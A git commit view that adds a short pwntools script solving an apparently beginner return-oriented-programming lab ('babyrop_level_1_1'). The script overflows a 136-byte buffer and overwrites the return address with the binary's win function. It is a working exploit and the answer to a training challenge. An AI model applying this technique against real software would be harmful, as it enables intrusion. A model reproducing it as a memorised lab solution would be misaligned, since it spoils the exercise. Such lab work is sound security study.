This commit is contained in:
jc
2025-08-05 18:24:54 +03:00
parent d087cb7430
commit 72e17002f9
8 changed files with 0 additions and 0 deletions
+16
View File
@@ -0,0 +1,16 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./babyrop_level_1_1", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*136
buf += p64(target.sym.win)
s(buf)
r.interactive()